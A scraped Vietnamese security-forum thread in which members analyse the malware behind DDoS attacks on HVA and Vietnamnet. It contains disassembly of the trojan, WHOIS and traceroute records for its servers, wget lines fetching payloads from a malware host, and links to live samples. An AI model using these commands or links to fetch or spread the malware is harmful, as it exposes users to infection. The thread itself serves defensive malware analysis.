@conmale Có 1 vấn đề này em hay bị mắc phải khi truy cập vào / ( tab 1 ) click vào Forum nó sẽ nhảy ra cái /tof/ ở 1 new tab mới ( tab 2 ) . Nhưng khi em tắt cái ( tab 2 ) rồi click vào cái link forum ở ( tab 1 ) thì nó lại trả về /null. Phải tắt trình duyệt đi mở lại mới vào được. 
Hì hì, vậy thì đừng tắt tab2 mà chỉ tắt tab1 và cứ thế mà dùng. Tắt tab2 và trở lại tab1 để click thì "nó" nghĩ đó là zombie cho nên nó "null" liền. Logic nằm ở chỗ đi theo từ tab1 đến tab2 và dùng tab2 chớ không ai đi ngược lại hết. 
Em thì luôn phải vào HVA theo 1 trong hai cách, từ trang chính hoặc mở thẳng một topic đã được bookmarks sẵn. Tuỳ từng lúc một trong hai cách đó sẽ được.]]>
/hvaonline/posts/list/39641.html#245375 /hvaonline/posts/list/39641.html#245375 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.mediafire.com/?u0c5e6zr5h6gcui ]]> /hvaonline/posts/list/39641.html#245378 /hvaonline/posts/list/39641.html#245378 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245380 /hvaonline/posts/list/39641.html#245380 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245381 /hvaonline/posts/list/39641.html#245381 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245387 /hvaonline/posts/list/39641.html#245387 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
@anh PXMMRF, conmale, bolzano_1989 Trong Windows XP đăng nhập bằng account limited khi 1 ứng dụng thay đổi trong Registry liên quan đến HKEY_LOCAL_MACHINE hoặc liên quan đến các system folder thì nó sẽ bị limited và yêu cầu chạy trên tài khoản Administrator Nhưng nếu những ứng dụng thay đổi trong Registry chỉ liên quan đến HKEY_CURRENT_USER thì nó vẫn có thể thực hiện được. ( ở đây là các ứng dụng chưa được setup trên Windows trước đó ) 
Khi dùng tài khoản limited trong WinXP (SP2 hoặc SP3)và không điều chỉnh "Security Options" trong computer management (để ở chế đô default) thì có thể cài và chạy một soft hay application trong các trường hợp sau: - Portable soft. - Stand-alone soft., application - Application đươc soạn thảo dùng cho all users (thí dụ các trình duyệt) Soft hay application không cài đươc và/hoăc không chạy khi trong quá trình cài đặt hay chạy nó phải access vào các folder/file mà account limited không có quyền mở, kích hoạt các service mà nó không có quyền, cũng như tạo một số loại registry không đươc phép.... Quay lai trường hợp cụ thể của STL virus AcrobatUpdater.exe thì: - Khi cài vào XP với quyền Admin 1 hoăc Admin 2 (Admin1 có khác Admin2 đấy nhé) thì AcrobatUpdater.exe được cài vào thư muc C/Program files/, như anh conmale đã viết. - Khi cài vào XP với quyền Limited thì nó tự đông được cài vào một thư muc khác: thư muc của chính user ấy trong C/Documents and settings/ và vẫn tao ra registry, đủ để active. Xin minh hoạ bằng hình cụ thể (các bạn xem cho sướng con mắt mình. Hì hì)

]]>
/hvaonline/posts/list/39641.html#245390 /hvaonline/posts/list/39641.html#245390 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://download.sysinternals.com/Files/SysinternalsMalwareCleaning.pdf Đợi mẫu của bạn !]]> /hvaonline/posts/list/39641.html#245398 /hvaonline/posts/list/39641.html#245398 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
1. Tại sao có mấy file mạo danh của stl không có đuôi .exe, tui không double click vô thì làm sao nhiểm virus vô máy tui được ? 2. Nhiều file như StaticCaches.dat, uxtheme.manifest... là các DLL. Các DLL này làm sao tự run được ? 3. Nó download bmp về thì làm sao sinh ra bot mới được ?  
a TQN xin cho e trích ngang bài viết này vì e đã đọc tới trang 17 rồi,nhưng vẫn chưa hiểu cách thức trên,em mong anh có 1 bài viết phân tích để e và các bạn khác nắm rõ hơn được không a ? vì e cũng là IT nhưng vẫn còn mù mờ về vấn đề này :-/ Cám ơn a !]]>
/hvaonline/posts/list/39641.html#245400 /hvaonline/posts/list/39641.html#245400 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
wget -t3 "http://high.paploz.com/xv.jpg" -U"An0nym0453"
wget -t3 "http://high.paploz.com/xc.jpg" -U"An0nym0453"
Host high.paploz.com có IP: 46.166.147.48. Nhờ anh PXMMRF kiểm tra host này. top.jpg, xc.jpg, xv.jpg được đặt lên webserver vào ngày 18-10-2011, 3h chiều. File AcrobatUpdater.exe này có modify code một số, nhưng cơ bản vẫn là VB và các phương thức tấn công bằng HTTP protocol dùng socket. File ngày 15-08-2011: http://www.mediafire.com/?vp9spwf2bnx7e5i File ngày 20-08-2011: http://www.mediafire.com/?6qj9841rxvone83 ]]>
/hvaonline/posts/list/39641.html#245405 /hvaonline/posts/list/39641.html#245405 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
Công nhận nhóm này cũng chịu chơi thiệt .]]>
/hvaonline/posts/list/39641.html#245407 /hvaonline/posts/list/39641.html#245407 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Found 2 domains hosted on the same web server as high.paploz.com (46.166.147.48). high.paploz.com (linkback) second.dinest.net (linkback)   who is hosting this
high.paploz.com high.paploz.com Is Hosted by Santrex RU VPS Services Hosting: Santrex RU VPS Services host the domain high.paploz.com IP Address: 46.166.147.48 Visit Santrex RU VPS Services now  
WHOIS
Visit AboutUs.org for more information about paploz.com AboutUs: paploz.com Domain name: paploz.com Registrant Contact: Whois Privacy Protection Service, Inc. Whois Agent () Fax: PMB 368, 14150 NE 20th St - F1 C/O paploz.com Bellevue, WA 98007 US Administrative Contact: Whois Privacy Protection Service, Inc. Whois Agent (yvrpwlywpp@whoisprivacyprotect.com) +1.4252740657 Fax: +1.4259744730 PMB 368, 14150 NE 20th St - F1 C/O paploz.com Bellevue, WA 98007 US Technical Contact: Whois Privacy Protection Service, Inc. Whois Agent (yvrpwlywpp@whoisprivacyprotect.com) +1.4252740657 Fax: +1.4259744730 PMB 368, 14150 NE 20th St - F1 C/O paploz.com Bellevue, WA 98007 US Status: Locked Name Servers: ns1.afraid.org ns2.afraid.org ns3.afraid.org ns4.afraid.org Creation date: 01 Aug 2011 08:59:00 Expiration date: 01 Aug 2012 00:59:00 Get Noticed on the Internet! Increase visibility for this domain name by listing it at www.whoisbusinesslistings.com =-=-=-= The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 Registrar: ENOM, INC. Whois Server: whois.enom.com Creation Date: 01-AUG-2011 Updated Date: 01-AUG-2011 Expiration Date: 01-AUG-2012 Nameserver: NS1.AFRAID.ORG Nameserver: NS2.AFRAID.ORG Nameserver: NS3.AFRAID.ORG Nameserver: NS4.AFRAID.ORG  
Visual Trace Route Tool
Host trace to high.paploz.com 22 hops / 47.4 seconds 1. dreamhost.com United States 2. dreamhost.com United States 3. ntt.net United States 4. ntt.net United States 5. ntt.net United States 6. ntt.net United States 7. ntt.net United States 8. ntt.net United States 9. ntt.net Germany 10. ntt.net Belgium 11. edpnet.net Belgium 12. edpnet.net Belgium 13. edpnet.net Belgium 14. edpnet.net Belgium 15. edpnet.net Russian Federation 16. westcall.ru Russian Federation 17. 82.199.119.33 Russian Federation 18. 82.199.119.146 Russian Federation 19. cod-rt1.tel.ru Russian Federation 20. iqhost.ru France 21. santrex.net 22. 46.166.147.48  
]]>
/hvaonline/posts/list/39641.html#245410 /hvaonline/posts/list/39641.html#245410 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Quay lai trường hợp cụ thể của STL virus AcrobatUpdater.exe thì: - Khi cài vào XP với quyền Admin 1 hoăc Admin 2 (Admin1 có khác Admin2 đấy nhé) thì AcrobatUpdater.exe được cài vào thư muc C/Program files/, như anh conmale đã viết. - Khi cài vào XP với quyền Limited thì nó tự đông được cài vào một thư muc khác: thư muc của chính user ấy trong C/Documents and settings/ và vẫn tao ra registry, đủ để active. Xin minh hoạ bằng hình cụ thể (các bạn xem cho sướng con mắt mình. Hì hì)  
Hôm nay rảnh rang, em coi kỹ lại thì đúng là bản XP SP3 em lấy từ CDE của công ty ra không phải là mặc định policies. Đây là bản "ghost" đã được điều chỉnh khá nhiều. Nó không cho phép người dùng bình thường chép thông tin vô c:\program files và cũng không cho user access registry. Thử lại stl malware bằng account thường trên bản xp sp3 này thì quả thật nó tạo AcrobatUpdater.exe trong "Application Data" nhưng không thể thêm bớt gì trong registry hết. Tóm lại, bolzano_1989 nhận xét đúng. Trên Windows XP (default), chạy bằng user bình thường vẫn có thể bị nhiễm stl malware. Malware này chỉ không nhiễm khi local policies được áp đặt cụ thể.]]>
/hvaonline/posts/list/39641.html#245411 /hvaonline/posts/list/39641.html#245411 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
.text:00401353         mov     [ebp+IsAdmin], ebx      ; ebx = 0
.text:00401359         mov     dword ptr [ebp+pIdentifierAuthority.Value], ebx
.text:0040135F         mov     word ptr [ebp+pIdentifierAuthority.Value+4], 500h ; Value[4] = 0; Value[5] = SECURITY_NT_AUTHORITY
.text:00401368         lea     eax, [ebp+pSid]
.text:0040136E         push    eax                     ; pSid
.text:0040136F         push    ebx                     ; nSubAuthority7 = 0
.text:00401370         push    ebx                     ; nSubAuthority6 = 0
.text:00401371         push    ebx                     ; nSubAuthority5 = 0
.text:00401372         push    ebx                     ; nSubAuthority4 = 0
.text:00401373         push    ebx                     ; nSubAuthority3 = 0
.text:00401374         push    ebx                     ; nSubAuthority2 = 0
.text:00401375         push    DOMAIN_ALIAS_RID_ADMINS ; nSubAuthority1
.text:0040137A         push    SECURITY_BUILTIN_DOMAIN_RID ; nSubAuthority0
.text:0040137C         push    2                       ; nSubAuthorityCount
.text:0040137E         lea     ecx, [ebp+pIdentifierAuthority]
.text:00401384         push    ecx                     ; pIdentifierAuthority
.text:00401385         call    ds:AllocateAndInitializeSid
.text:0040138B         mov     [ebp+IsAdmin], eax
.text:00401391         cmp     eax, ebx
.text:00401393         jz      short @@UserIsLimit
.text:00401395         lea     edx, [ebp+IsAdmin]
.text:0040139B         push    edx                     ; IsMember
.text:0040139C         mov     eax, [ebp+pSid]
.text:004013A2         push    eax                     ; SidToCheck
.text:004013A3         push    ebx                     ; TokenHandle
.text:004013A4         call    ds:CheckTokenMembership
.text:004013AA         test    eax, eax
.text:004013AC         jnz     short @@UserIsAdmin
.text:004013AE         mov     [ebp+IsAdmin], ebx
.text:004013B4 @@UserIsAdmin:                          ; CODE XREF: Infect+13Cj
.text:004013B4         mov     ecx, [ebp+pSid]
.text:004013BA         push    ecx                     ; pSid
.text:004013BB         call    ds:FreeSid
.text:004013C1         mov     eax, [ebp+IsAdmin]
.text:004013C7 @@UserIsLimit:                          ; CODE XREF: Infect+123j
.text:004013C7         push    ebx                     ; fCreate
.text:004013C8         lea     edx, [ebp+PathName]
.text:004013CE         mov     esi, ds:SHGetSpecialFolderPathW
.text:004013D4         cmp     eax, 1
.text:004013D7         jnz     @@NormalUser
.text:004013DD         push    CSIDL_PROGRAM_FILES     ; csidl
.text:004013DF         push    edx                     ; pszPath
.text:004013E0         push    ebx                     ; hwnd
.text:004013E1         call    esi ; SHGetSpecialFolderPathW
.text:004013E3         cmp     eax, 1
.text:004013E6         jnz     @@Return
.text:004013EC         push    ebx                     ; fCreate
.text:004013ED         push    CSIDL_PROGRAM_FILES     ; csidl
.text:004013EF         lea     eax, [ebp+FileName]
.text:004013F5         push    eax                     ; pszPath
.text:004013F6         push    ebx                     ; hwnd
.text:004013F7         call    esi ; SHGetSpecialFolderPathW
.text:004013F9         cmp     eax, 1
.text:004013FC         jnz     @@Return
.text:00401402         lea     ecx, [ebp+pMore]
.text:00401408         mov     edx, offset szSandboxie ; "Sandboxie"
.text:0040140D         call    Xor_5_Decode
.text:00401412         cmp     eax, 1
.text:00401415         jnz     @@Return
.text:0040141B         lea     ecx, [ebp+var_A44]
.text:00401421         mov     edx, offset szSbieSvc_exe ; "SbieSvc.exe"
.text:00401426         call    Xor_5_Decode
.text:0040142B         cmp     eax, 1
.text:0040142E         jnz     @@Return
.text:00401434         lea     ecx, [ebp+var_83C]
.text:0040143A         mov     edx, offset szSbieMgm_dll ; "SbieMgm.dll"
.text:0040143F         call    Xor_5_Decode
.text:00401444         cmp     eax, 1
.text:00401447         jnz     @@Return
.text:0040144D         lea     ecx, [ebp+pMore]
.text:00401453         push    ecx                     ; pMore
.text:00401454         lea     edx, [ebp+PathName]
.text:0040145A         push    edx                     ; pszPath
.text:0040145B         mov     edi, PathAppendW
.text:00401461         call    edi ; PathAppendW
Từ thời còn WinNT4, 2000, mấy cái hàm AllocateAndInitializeSid, CheckTokenxxx... là em đã code rồi, thời còn help = WinHelp kìa, bởi vậy em nhìn là thấy ngay ;) Các hàm quen thuộc mà stl coder thường dùng là memset, memcpy, SHGetSpecialFolderPath..., fread, fwrite, fseek (dùng nhiều nhất cho lấy kích thước - size của file)... PS: Tới hiện nay em vẫn chưa có mẩu đang ddos Vietnamnet và ddos hva với User-Agent string đặc biệt. Bà con tiếp tục nhé ! Những ai không vào blogspot của Gấu gồ được thì chắc chắn 100% là mạng các bạn đã dính bot và virus nằm vùng của stl. 2 sonngh: Không gọi là nhóm được đâu, theo tôi, phải gọi là phòng, ban hay cơ quan gì đó mới đúng ! Mấy anh stl lúc đầu rêu rao, hù doạ người ta là một nhóm "du học sinh", "du học sinh" cái con khỉ, "du côn sinh (ra)" thì có ! Em nói có phải không mấy anh stl ? Nội cái tên stl mấy anh mang lên người không còn bị vô số biến thể, nhiều hơn số biến thể trò mèo xxx của mấy anh rồi =)) Thông thường, em hay disable KIS của em, khi cần quét mới quét. Lúc nãy vô tình enable KIS, wget thử images01.gif từ penop.net, KIS nhảy ra liền, ê, địa chỉ độc hại, tao cấm. Hì hì, vậy cũng được ;)]]>
/hvaonline/posts/list/39641.html#245414 /hvaonline/posts/list/39641.html#245414 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245415 /hvaonline/posts/list/39641.html#245415 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Từ từ mình sẽ post sau, mẫu của stl thì nhiều lắm, phân tích hoạt động của chỉ 1 file thôi đã mấy chục tấm hình rồi. Bà con thân mến, sau khi second.dinest.com die, giờ stl lại nhảy qua Nhật, thuê webserver bên đó để đặt xc.jpg và xv.jpg: Code:
wget -t3 "http://high.paploz.com/xv.jpg" -U"An0nym0453"
wget -t3 "http://high.paploz.com/xc.jpg" -U"An0nym0453"
Host high.paploz.com có IP: 46.166.147.48. Nhờ anh PXMMRF kiểm tra host này. top.jpg, xc.jpg, xv.jpg được đặt lên webserver vào ngày 18-10-2011, 3h chiều. File AcrobatUpdater.exe này có modify code một số, nhưng cơ bản vẫn là VB và các phương thức tấn công bằng HTTP protocol dùng socket. File ngày 15-08-2011: http://www.mediafire.com/?vp9spwf2bnx7e5i File ngày 20-08-2011: http://www.mediafire.com/?6qj9841rxvone83  
Có đây TQN à. high.paploz.com Whois---> privacy protected - IP 46.166.147.48 - Trên webserver chỉ hosting một website này (high.paploz.com) - Web server (Trình quản lý website) NGINX 1.1.0 ( giống như các webserver khác của STL) - Sử dụng các nameserver như các webserver khác của STL. Có vẻ như STL có mối liên quan chặt chẽ với công ty quản lý nameserver, hay có tay trong ở đây. Nên việc chuyển IP cho webserver (điều chỉnh Record A) thuận lơi và nhanh chóng hơn bình thường. - Địa chỉ đặt webserver: NGA (Russian) - Webserver mở cổng 80 TCP HTTP (webser được cài đặt vào khoảng 5,6-8-2011, mở ngày nào thì không rõ) - File top.jpg đã bị removed (5.00PM 20-8-2011) - File xv.jpg chỉ là 1 file .txt bình thường value của nó là: 2011-08-18 15:22:46 (Có lẽ đây là giờ tấn công vào một website nào đó? ) - File xc.jpg -đươc protected- nhờ TQN RCE giùm. Thanks Xem visual route
Special Note: Chỉ là giỡn chơi. Đố các bạn trong hình visual route mà tôi post trên đây có chứa(embedded) cái gì. Nôi dung thế nào. Ai biết xin hậu tạ chầu bia. Chỉ là giỡn vui cho giảm stress chút ít thôi. Hì hì.]]>
/hvaonline/posts/list/39641.html#245416 /hvaonline/posts/list/39641.html#245416 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245431 /hvaonline/posts/list/39641.html#245431 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245432 /hvaonline/posts/list/39641.html#245432 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Có: Chép vào %Program Files% hay %WinDir%, ghi vào HKLM. Không: Chép vào %AppData% của user, ghi vào HKCU.  
Nhiêu đây công đoạn lây lan là Đủ để bất kỳ thứ gì chạy được trên windows. ]]>
/hvaonline/posts/list/39641.html#245433 /hvaonline/posts/list/39641.html#245433 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 wrote:
Các bạn HVA nhiệt tình quá, kiểu này thì STL phải thâm hụt ngân quỹ nặng :D Có ai làm cái tổng kết xem STL đã tốn bao nhiêu tiền để mua domain mới kể từ khi bị phanh phui không nhỉ. 
Theo mình nghĩ bọn Sờ Ti Lợn này đã dùng nhiều trò ăn cắp email và tài khoản cá nhân của mọi người trên Internet thì kiểu gì chúng nó cũng dùng "Credit Card chùa" để mua sắm Domain. Quá khứ ở Đức cho thấy rất nhiều người đã liều chết để trèo qua tường Berlin từ Đông sang Tây nhiều lắm. ngày nay bọn Sờ Ti Lợn này lại muốn ở bên phía đông thành lợn cho tụi nó sờ ti đây mà =)). sang phía tây cái là Sờ Ti Lợn chắc là đi sờ ty nhau =)) Không nên cố giữ những gì sắp lụi tàn ... nó là vòng luân hồi rồi ... Khi bức tường được phá để tất cả thành phía tây thì lúc đấy mấy con Sờ Ti Lợn này sẽ bị cắt tiết hết.]]>
/hvaonline/posts/list/39641.html#245441 /hvaonline/posts/list/39641.html#245441 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245442 /hvaonline/posts/list/39641.html#245442 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. @TQN: Liệu trong những virus của STL có sử dụng những kĩ thuật nâng quyền, ring0 Access, ... không anh ? Hay nói cách khác là virus của STL can thiệp đến mức độ nào vào hệ thống rùi ạ ?]]> /hvaonline/posts/list/39641.html#245444 /hvaonline/posts/list/39641.html#245444 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

.lht. wrote:
Không có sài chùa đâu bạn ;)) Nếu như theo dõi các reply của mọi người, chắc hẳn ai cũng nhận ra STL là 1 tổ chức lớn và không đơn giản, có được hỗ trợ lớn về nhiều mặt. Vậy tại sao phải dùng CC chùa ? Mà đã là "tổ chức lớn" thì ai lại động đến CC chùa nhỉ ? 
Tổ chức lớn có 2 loại bạn ạ: Tổ chức sạch và bẩn. Tổ chức bẩn thì chắc chắn sẽ dùng tiền bẩn. STL khi reg đều cần phải giấu kín thông tin về mình. thứ nhất là sẽ sử dụng các dịch vụ private information của các nhà cung cấp hosting và domain. thứ 2 là nhờ 1 người khác đứng tên, nhưng cả 2 cách này có vẻ không an toàn cho lắm. cách an toàn nhất và hay nhất là sử dụng 1 thằng mà nó không biết mình và tội gì không dùng tiền nó luôn, bọn STL này dùng trò cắp password thì tha gì không xài luôn cc chùa. các dự án ở việt nam thường được mấy lão xếp tổng đưa và chi cho 1 đống tiền, rồi làm đi. cứ thấy có cái kết quả là được. mặc dù kết quả không cần biết là bệnh thành tích hay không ;)) vì vậy cái tổ chức này thì thằng sếp đầu đất cũng quang 1 cục tiền cho cái nhóm đấy. rồi chúng nó sẽ chia nhau tiêu tiền, xài cc chùa mua hosting với domain an toàn mà tiết kiện được 1 khoản để anh em trong nhóm chia chác nhau. ]]>
/hvaonline/posts/list/39641.html#245445 /hvaonline/posts/list/39641.html#245445 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245447 /hvaonline/posts/list/39641.html#245447 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Tôi đã tìm ra file virus (process) hiện đang tấn công vào HVA Process này mở rất nhiều và liên tục các thread (cổng TCP) kết nối- tấn công vào cổng 80 TCP của website HVA. Nhịp độ tấn công khá mạnh, khoảng 5-6 kết nối trong một giây (với máy có cấu hình thấp, tốc độ CPU chậm-máy tôi đang thí nghiệm). Gói tin tấn công có dung lương từ 25-62 Bytes. Quá trình tấn công này không thông qua trình duyệt mà từ process tấn công thẳng vào cổng 80 TCP của HVA webserver. Ngay khi bị nhiễm vào máy process khởi phát tự động quá trình tấn công và cũng tự kích hoat khi máy khởi đông lại. Tuy vẫn dùng tên file (process) cũ, là AcrobatUpdater.exe, nhưng đây lai là file có cấu trúc mới. Chúng hoàn toàn không bị Avira antivirus phát hiện khi đươc cài vào máy và ngay cả khi scan thẳng vào file. (AcrobatUpdater.exe cũ - TQN cung cấp vào khoảng 28-7-2011 và 5-8-2011 bị Avira Antivirus phát hiện dễ dàng) File virus này có tên là "AcrobatUpdater_20_08_2011" (theo anh TQN đặt lúc upload lên mạng) Có lẽ đây cũng là file (process) vừa mới đây tấn công DDoS vào vietnamnet.net



]]>
/hvaonline/posts/list/39641.html#245448 /hvaonline/posts/list/39641.html#245448 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. TRJ/hvadetec-1 (Xin anh conmale và TQN góp ý thêm) Virus-Trojan do các hacker mũ đen bất kỳ, nào đó tạo ra và gây lây nhiễm trên mạng (trường hợp này là STL), tổ chức phát hiện đầu tiên ra nó và tư vấn cách diệt nó trong hệ thống máy, có quyền đặt tên cho nó. Trân trọng đề nghi các công ty Antivius, đăc biệt là các công ty VN tôn trọng thông lệ này. Xin anh TQN và acoutic...RCE kỹ nó và tư vấn cách diệt đơn giản, hiệu quả nhất mà một user thông thường có thể áp dụng. Nên viết một "Virus-Trojan Removal tool" nhỏ để diệt con này và có thể cả các trojan-virus khác của STL và phổ biến trên mạng Chúng tôi (conmale, TQN và tôi) đang tiếp tục tìm hiểu thêm về Trojan đang tấn công vào vietnamnet.net, tờ báo mạng chúng tôi có cảm tình]]> /hvaonline/posts/list/39641.html#245458 /hvaonline/posts/list/39641.html#245458 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://penop.net/images01.gif. Code của con này vẫn vậy, chỉ khác các con AcrobatUpdater.exe cũ ở chổ fix một số bug, cải tiến một số hàm, còn lại cơ bản vẫn không đổi, không thêm thêm được 1 hàm nào cả. Em đã upload nó lên 1 loạt AVs rồi, chờ update thôi anh ! Vấn đề quan trọng bây giờ là tìm ra mẫu đang ddos Vietnamnet, tìm ra cái C&C webserver giấu mặt này của bọn stl. Các bạn đừng sợ, ngại ngùng gì cả, các bạn chỉ tìm mẫu, up mẫu thì mắc mớ cái gì phải sợ, sợ stl, sợ pháp luật à ? Pháp luật nào cấm các bạn tham gia HVA forum, cấm tham gia thảo luận, RCE virus, cấm tìm và up mẫu virus ????? Tôi nói vậy vì có nhiều bạn PM, mail cho tui để gởi mẫu, nhưng lại sợ tôi nói ra nick HVA, mail address của các bạn. Dĩ nhiên là tôi sẽ làm theo yêu cầu của các bạn. Nhưng tôi lại ngạc nhiên, sao lại phải sợ, tôi, anh PXMMRF, accourics.... và nhiều anh em HVA trong nước không sợ thì tại sao các bạn lại sợ ???????? 2 .lht.: Trò mèo của stl chỉ ở mức user mode, code = C/C++ & VB, hoạt động bình thường ở mức user mode như các app bình thường khác. Coder của stl chưa dùng 1 kỹ thuật pure ASM tiên tiến nào mà giới virus writer thế giới đang dùng, và cũng chưa đụng tới kernel driver. Khi nào tụi nó đụng tới rootkit tui sẽ post phân tích. Đang luyện lại SoftIce và WinDbg để chuẩn bị debug rootkit của mấy anh stl, bỏ lâu lụt nghề rồi.]]> /hvaonline/posts/list/39641.html#245459 /hvaonline/posts/list/39641.html#245459 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Nó không mới đâu anh PXM. Vẫn là AcrobatUpdater.exe cũ, được down về từ http://penop.net/images01.gif. Code của con này vẫn vậy, chỉ khác các con AcrobatUpdater.exe cũ ở chổ fix một số bug, cải tiến một số hàm, còn lại cơ bản vẫn không đổi, không thêm thêm được 1 hàm nào cả. Em đã upload nó lên 1 loạt AVs rồi, chờ update thôi anh ! [/b][/color]  
@TQN : anh ơi, nếu như version cũ của con trojan AcrobatUpdater.exe chưa được đặt tên, và anh PXMMFX đã đặt tên cho phiên bản mới version 2, của con này thì theo em vẫn được xem là tên của một thể Trojan mới mà derivative từ phiên bản cũ mà. đương nhiên là bọn sư tổ lợn này sẽ chỉ biến thể , và phát triển những con malware này trên nền tảng những con đầu tiên chúng ị ra mà thôi, vì trí tuệ chúng có thế thôi mà hì hì . còn trong danh sách đó vẫn còn một con mà đang ddogs vietnamnet giấu mặt hả anh ??? thế thì fia' Vietnamet Admins phải có những nghiên cứu từ các nguồn dos và kết hợp với các anh mà tìm ra chứ nhỉ ? chúc anh một ngay happy day ]]>
/hvaonline/posts/list/39641.html#245466 /hvaonline/posts/list/39641.html#245466 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Nó không mới đâu anh PXM. Vẫn là AcrobatUpdater.exe cũ, được down về từ http://penop.net/images01.gif. Code của con này vẫn vậy, chỉ khác các con AcrobatUpdater.exe cũ ở chổ fix một số bug, cải tiến một số hàm, còn lại cơ bản vẫn không đổi, không thêm thêm được 1 hàm nào cả. Em đã upload nó lên 1 loạt AVs rồi, chờ update thôi anh ! Vấn đề quan trọng bây giờ là tìm ra mẫu đang ddos Vietnamnet, tìm ra cái C&C webserver giấu mặt này của bọn stl. Các bạn đừng sợ, ngại ngùng gì cả, các bạn chỉ tìm mẫu, up mẫu thì mắc mớ cái gì phải sợ, sợ stl, sợ pháp luật à ? Pháp luật nào cấm các bạn tham gia HVA forum, cấm tham gia thảo luận, RCE virus, cấm tìm và up mẫu virus ????? Tôi nói vậy vì có nhiều bạn PM, mail cho tui để gởi mẫu, nhưng lại sợ tôi nói ra nick HVA, mail address của các bạn. Dĩ nhiên là tôi sẽ làm theo yêu cầu của các bạn. Nhưng tôi lại ngạc nhiên, sao lại phải sợ, tôi, anh PXMMRF, accourics.... và nhiều anh em HVA trong nước không sợ thì tại sao các bạn lại sợ ???????? 2 .lht.: Trò mèo của stl chỉ ở mức user mode, code = C/C++ & VB, hoạt động bình thường ở mức user mode như các app bình thường khác. Coder của stl chưa dùng 1 kỹ thuật pure ASM tiên tiến nào mà giới virus writer thế giới đang dùng, và cũng chưa đụng tới kernel driver. Khi nào tụi nó đụng tới rootkit tui sẽ post phân tích. Đang luyện lại SoftIce và WinDbg để chuẩn bị debug rootkit của mấy anh stl, bỏ lâu lụt nghề rồi. 
Anh TQN có up lên cho Microsoft không ? KIS em mua bị đứng hoài nên trở lại dùng MSE rồi. AV nào trả lời, chưa trả lời anh cho mọi người biết luôn để yên tâm. ]]>
/hvaonline/posts/list/39641.html#245467 /hvaonline/posts/list/39641.html#245467 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245468 /hvaonline/posts/list/39641.html#245468 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245472 /hvaonline/posts/list/39641.html#245472 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. GoogleCrashHandler.exe, vui lòng upload lên đâu đó giùm anh em kỹ thuật của HVA. Cảm ơn nhiều ! Vì GoogleCrashHandler.exe, GoogleUpdater.exe nguyên bản là file của Google, stl coder build ra file khác nhưng vẫn giả danh (dùng cùng tên) với file của Google, nên tui mạn phép hướng dẫn các bạn kiểm tra file sạch của Google bằng hình sau:
File nào cũng vậy, nếu right click, property ra hình trên thì là file sạch, có Digital Signatures, còn không có thì là file virus.]]>
/hvaonline/posts/list/39641.html#245476 /hvaonline/posts/list/39641.html#245476 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
2 vndncn: Google: submit malware sample Trước mắt, các bạn chịu khó search trên máy các bạn, nếu có tìm thấy file: GoogleCrashHandler.exe, vui lòng upload lên đâu đó giùm anh em kỹ thuật của HVA. Cảm ơn nhiều ! 
http://www.mediafire.com/?bdl5qgxbrd9aet3 Bác kiểm tra giùm! Thanks!]]>
/hvaonline/posts/list/39641.html#245482 /hvaonline/posts/list/39641.html#245482 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245483 /hvaonline/posts/list/39641.html#245483 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Cảm ơn sacroyant: file cậu úp là file GoogleCrashHandler.pf, tức file prefetch cache của GoogleCrashHandler.exe. Phải là đuôi .exe nhé ! 
Sorry bác, tôi không nhìn kỹ chỗ bác bôi đỏ. Máy của tôi có cài chrome nhưng không tìm thấy file GoogleCrashHandler.exe.]]>
/hvaonline/posts/list/39641.html#245484 /hvaonline/posts/list/39641.html#245484 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245486 /hvaonline/posts/list/39641.html#245486 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn wrote:
